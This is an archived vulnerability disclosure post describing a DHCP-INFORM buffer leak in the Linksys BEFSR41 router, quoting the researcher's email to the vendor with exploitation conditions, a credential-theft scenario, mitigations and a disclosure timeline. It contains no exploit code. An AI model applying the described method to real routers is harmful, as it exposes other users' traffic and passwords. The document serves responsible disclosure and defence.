<<< Date Index >>>     <<< Thread Index >>>

Linksys BEFSR41 DHCP vulnerability server leaks network data




On May 2nd 2004 I sent an email (detailed below) to Linksys concerning this 
vulnerability.  Linksys has posted the vulnerability and a fix for the Revision 
3 router since then here:

http://linksys.custhelp.com/cgi-bin/linksys.cfg/php/enduser/std_adp.php?p_faqid=832&p_created=1086294093&p_sid=pU1X1idh&p_lva=&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD02NTQmcF9wYWdlPTE*&p_li=

Upgrades for Revs 1 & 2 are promised soon.

More details are included in the email:
************************
Linksys,

I believe I have found a vulnerability in your BEFSR41 router.  

The vulnerability involves a buffer leakage in the DHCP service. As a result, 
data that has recently passed through the router can be compromised by an 
attacker on the LAN.

This vulnerability was tested with firmware version 1.45.7

Conditions required to exploit the vulnerability:
1) An attacking host on the LAN side of the router that can broadcast 
DHCP-INFORM packets to the LAN.  
2) A sniffer on the attacking host to record the router's response packets.
3) Data has recently passed between the LAN and WAN sides of the router.
4) DHCP is enabled on the router.

Details
I used a Windows 2000 DHCP server to create the DHCP-INFORM packets.  The 
server broadcasts the DHCP-INFORM message once an hour, or when the service is 
restarted.  These packets must be broadcast to the LAN side of the router.

If DHCP is enabled on the Router, it will respond to each broadcast with a 
packet containing leaked buffer data.  The response is sent directly to the IP 
address of the attacking host.  Approximately 488 bytes of the 590 byte 
response comes from the router's buffer, providing easily recognizable 
fragments of recently viewed web pages, etc.

Effects of the vulnerability:
Data that has passed through the router recently can be compromised by an 
attacker with access to the LAN.  This can include email sent or received, web 
pages viewed, and passwords (cleartext or weakly encrypted) that have been used 
by a LAN client to access a WAN resource or vice versa.

Interesting notes about the vulnerability that make it more difficult to detect 
an attacker.
- The attack does not rely on traditional methods to overcome switched 
networks. 

- The attacking host does not need to place its NIC in promiscuous mode.  

- It is also possible to craft DHCP-INFORM packets that are not broadcast, but 
directed at the router's address.

- This vulnerability also makes it possible to view data that was passed 
through the router at some time in the past, making it unnecessary to capture 
the traffic when it actually occurs.  This makes the physical aspect of 
security more difficult.  The victim and the attacker do not have to be on the 
LAN at the same time.

Here is an example of that last point:
1) A LAN user is visiting a website that requires HTTP-BASIC authentication, 
logs in, reads a few pages, and then closes the web browser.

2) At some point in the future, the attacker begins making DHCP-INFORM 
broadcasts from the LAN and collecting the buffer leakage that results.

3) Among the leaked data is the base64 encoded authorization that was used to 
access the HTTP-BASIC authenticated website.  The user's password has now been 
compromised.

Mitigating Factors

- The attacker must be on the LAN. 

- Only data which is still in the buffer can be compromised.  This limits the 
vulnerable data to the last few most recently visited web pages or a similar 
amount of data.

- Passing "unimportant" data through the router will flush the buffer and 
prevent the compromise of more important data.

- Cycling power to the router will clear the buffer.

- The DHCP service can be disabled on the router, removing the vulnerability 
entirely.

Moving Forward

It is my intention to post this vulnerability on Bugtraq in 1 month.  However, 
I want to give Linksys every opportunity to prepare a fix for this 
vulnerability before it is made public.  If more than 1 month will be required 
to resolve this issue, please let me know and I will work with you. 

I hope I have not left out any important details.  Please do not hesitate to 
contact me if you have any questions, and I wish you the best of luck in 
finding a solution.  Capture files of the vulnerability being exploited are 
available to you if you need them.

Sincerely,

Lance Armstrong
********************

The response I received from Linksys on 5/3/2004 led me to believe that I was 
the first to bring this to their attention, but the Linksys posting did not 
credit anyone specifically with finding the vulnerability.